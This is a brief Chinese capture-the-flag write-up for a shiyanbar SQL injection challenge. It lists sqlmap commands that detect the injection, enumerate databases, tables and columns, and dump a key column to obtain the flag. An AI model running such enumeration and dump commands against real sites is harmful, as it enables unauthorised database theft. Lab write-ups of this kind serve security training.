题目:
很明显。过年过节不送礼,送礼就送这个
格式:
解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1
首先用sqlmap判断是否存在sql注入
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"
然后爆出其数据库名称
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs
爆出其表
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
爆出字段
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
得到flage